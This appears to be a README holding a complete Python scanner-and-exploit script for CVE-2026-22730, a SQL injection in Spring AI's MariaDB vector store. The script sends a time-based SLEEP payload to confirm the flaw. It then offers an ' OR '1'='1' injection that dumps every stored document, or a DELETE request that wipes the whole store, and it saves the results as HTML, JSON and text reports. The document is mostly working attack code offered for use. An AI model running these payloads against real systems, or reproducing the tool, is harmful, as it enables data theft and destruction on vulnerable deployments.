README.md
Rendering markdown...
#!/usr/bin/env python3
print("""
███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░ ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗ ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║ ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║ ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝ ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░ ░╚════╝░╚═╝░░╚═╝
CVE-2026-22730 Scanner & Exploit
SQL Injection in Spring AI's MariaDB Vector Store
Supports GET (query parameter) and POST (JSON body) with placeholder.
NULL200OK 💀🔥created by NABEEL 🔥💀
""")
import requests
import time
import json
import sys
import argparse
from datetime import datetime
from urllib.parse import urlencode, quote_plus
# ---------------------------
# Configuration
# ---------------------------
DEFAULT_SLEEP = 5 # seconds for time-based detection
TIMEOUT = 10 # HTTP request timeout
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Marker for payload replacement in POST JSON
PAYLOAD_MARKER = "__PAYLOAD__"
# ---------------------------
# Helper Functions
# ---------------------------
def send_request(base_url, method, param_name, value, json_template=None):
"""
Send an HTTP request with the injected value.
Supports GET (query parameter) and POST (JSON body with placeholder).
Returns (response, elapsed_time).
"""
headers = {"User-Agent": USER_AGENT}
method = method.upper()
if method == "GET":
params = {param_name: value}
url = base_url + "?" + urlencode(params, quote_via=quote_plus)
try:
start = time.time()
resp = requests.get(url, headers=headers, timeout=TIMEOUT)
elapsed = time.time() - start
return resp, elapsed
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return None, 0
elif method == "POST":
if not json_template:
print("[!] POST method requires --json-template with placeholder.")
return None, 0
# Replace marker with actual value
body_str = json_template.replace(PAYLOAD_MARKER, value)
try:
body = json.loads(body_str)
except json.JSONDecodeError:
print("[!] Invalid JSON template.")
return None, 0
headers["Content-Type"] = "application/json"
try:
start = time.time()
resp = requests.post(base_url, json=body, headers=headers, timeout=TIMEOUT)
elapsed = time.time() - start
return resp, elapsed
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return None, 0
elif method == "DELETE":
# For DELETE, we can either send query param or JSON body.
# We'll support query parameter (as in original advisory) and JSON body if template provided.
if json_template:
# DELETE with JSON body (some APIs accept it)
body_str = json_template.replace(PAYLOAD_MARKER, value)
try:
body = json.loads(body_str)
except json.JSONDecodeError:
print("[!] Invalid JSON template.")
return None, 0
headers["Content-Type"] = "application/json"
try:
start = time.time()
resp = requests.delete(base_url, json=body, headers=headers, timeout=TIMEOUT)
elapsed = time.time() - start
return resp, elapsed
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return None, 0
else:
# DELETE with query parameter
params = {param_name: value}
url = base_url + "?" + urlencode(params, quote_via=quote_plus)
try:
start = time.time()
resp = requests.delete(url, headers=headers, timeout=TIMEOUT)
elapsed = time.time() - start
return resp, elapsed
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return None, 0
else:
print(f"[!] Unsupported method: {method}")
return None, 0
def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None):
"""
Time‑based detection: compare normal request vs. SLEEP payload.
Returns True if vulnerable, False otherwise.
"""
print("[*] Sending baseline request...")
resp1, time1 = send_request(url, method, param, baseline_value, json_template)
if resp1 is None:
print("[!] Baseline request failed. Exiting.")
return False
# SQLi payload that tries to inject a SLEEP
payload = f"' OR SLEEP({sleep_time}) --"
print(f"[*] Sending time‑based payload: {payload}")
resp2, time2 = send_request(url, method, param, payload, json_template)
if resp2 is None:
print("[!] Payload request failed. Exiting.")
return False
print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")
# If payload took at least sleep_time seconds longer, consider vulnerable
if time2 - time1 >= sleep_time - 1: # allow 1s network jitter
print("[+] Target appears VULNERABLE to SQL injection!")
return True
else:
print("[-] Target does NOT seem vulnerable.")
return False
def exploit_retrieve_all(url, method, param, json_template=None):
"""
Send payload that retrieves all rows (by making WHERE clause always true).
Returns the response text.
"""
payload = "' OR '1'='1"
print(f"[*] Exploiting with payload (retrieve all): {payload}")
resp, _ = send_request(url, method, param, payload, json_template)
if resp:
return resp.text
else:
return ""
def exploit_delete_all(url, method, param, json_template=None):
"""
Send payload that deletes all rows.
Returns the response text (if any).
"""
payload = "' OR '1'='1"
print(f"[*] Exploiting with payload (DELETE all): {payload}")
# Use DELETE method
resp, _ = send_request(url, "DELETE", param, payload, json_template)
if resp:
return resp.text
else:
return ""
def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None):
"""
Save results in HTML, JSON, and TXT files.
"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
base_filename = f"cve-2026-22730_{timestamp}"
# Prepare data structure
report = {
"timestamp": timestamp,
"target": target_url,
"method": method,
"vulnerable": vuln_status,
"detection_method": "time-based SQL injection",
"exploit_type": exploit_type,
"exploit_result": exploit_data if exploit_data else None
}
# JSON
with open(f"{base_filename}.json", "w") as f:
json.dump(report, f, indent=4)
print(f"[+] JSON report saved: {base_filename}.json")
# TXT
with open(f"{base_filename}.txt", "w") as f:
f.write(f"CVE-2026-22730 Scan Report\n")
f.write(f"Timestamp: {timestamp}\n")
f.write(f"Target: {target_url}\n")
f.write(f"Method: {method}\n")
f.write(f"Vulnerable: {vuln_status}\n")
if exploit_type:
f.write(f"Exploit performed: {exploit_type}\n")
if exploit_data:
f.write("\n--- Exploitation Result ---\n")
f.write(exploit_data)
print(f"[+] TXT report saved: {base_filename}.txt")
# HTML
html_content = f"""<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-22730 Scan Report</title>
<style>
body {{ font-family: Arial, sans-serif; margin: 40px; }}
h1 {{ color: #333; }}
.vuln-yes {{ color: red; font-weight: bold; }}
.vuln-no {{ color: green; }}
pre {{ background: #f4f4f4; padding: 10px; border: 1px solid #ddd; }}
</style>
</head>
<body>
<h1>CVE-2026-22730 SQL Injection Scanner</h1>
<p><strong>Timestamp:</strong> {timestamp}</p>
<p><strong>Target URL:</strong> {target_url}</p>
<p><strong>HTTP Method:</strong> {method}</p>
<p><strong>Vulnerable:</strong> <span class="vuln-{'yes' if vuln_status else 'no'}">{vuln_status}</span></p>
<h2>Exploitation</h2>
<p><strong>Type:</strong> {exploit_type if exploit_type else "None"}</p>
<pre>{exploit_data if exploit_data else "No exploitation performed."}</pre>
</body>
</html>"""
with open(f"{base_filename}.html", "w") as f:
f.write(html_content)
print(f"[+] HTML report saved: {base_filename}.html")
# ---------------------------
# Main
# ---------------------------
def main():
parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
args = parser.parse_args()
# Interactive mode if arguments missing
if not args.url:
print("=== CVE-2026-22730 Scanner ===\n")
args.url = input("Enter target URL: ").strip()
args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
if args.method not in ["GET", "POST"]:
print("[!] Invalid method. Using GET.")
args.method = "GET"
if args.method == "GET":
args.param = input("Enter query parameter name (e.g., department): ").strip()
else: # POST
args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
if PAYLOAD_MARKER not in args.json_template:
print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
sys.exit(1)
baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
if baseline_input:
args.baseline = baseline_input
sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
if sleep_input:
try:
args.sleep = int(sleep_input)
except ValueError:
print("[!] Invalid number. Using default.")
else:
# Validate arguments
if args.method == "POST" and not args.json_template:
print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
sys.exit(1)
if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
sys.exit(1)
if args.method == "GET" and not args.param:
print("[!] GET method requires --param.")
sys.exit(1)
# Remove trailing slash if present
args.url = args.url.rstrip("/")
print(f"\n[*] Targeting: {args.url} with method {args.method}")
# Step 1: Detection
vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)
exploit_data = None
exploit_type = None
if vuln:
print("\n[?] Target is vulnerable. Choose exploitation option:")
print(" 1. Retrieve all documents (SELECT injection)")
print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE")
print(" 3. Skip exploitation")
choice = input("Enter 1, 2, or 3: ").strip()
if choice == '1':
exploit_type = "RETRIEVE_ALL"
exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
if exploit_data:
print("[+] Data retrieval completed.")
else:
print("[!] Exploit failed or returned no data.")
elif choice == '2':
print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
confirm = input("Type 'yes' to confirm: ").strip().lower()
if confirm == 'yes':
exploit_type = "DELETE_ALL"
exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
if exploit_data:
print("[+] Delete request sent. Check response.")
else:
print("[!] Delete exploit failed.")
else:
print("[*] Deletion cancelled.")
else:
print("[*] Skipping exploitation.")
# Step 3: Save results
save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)
if __name__ == "__main__":
main()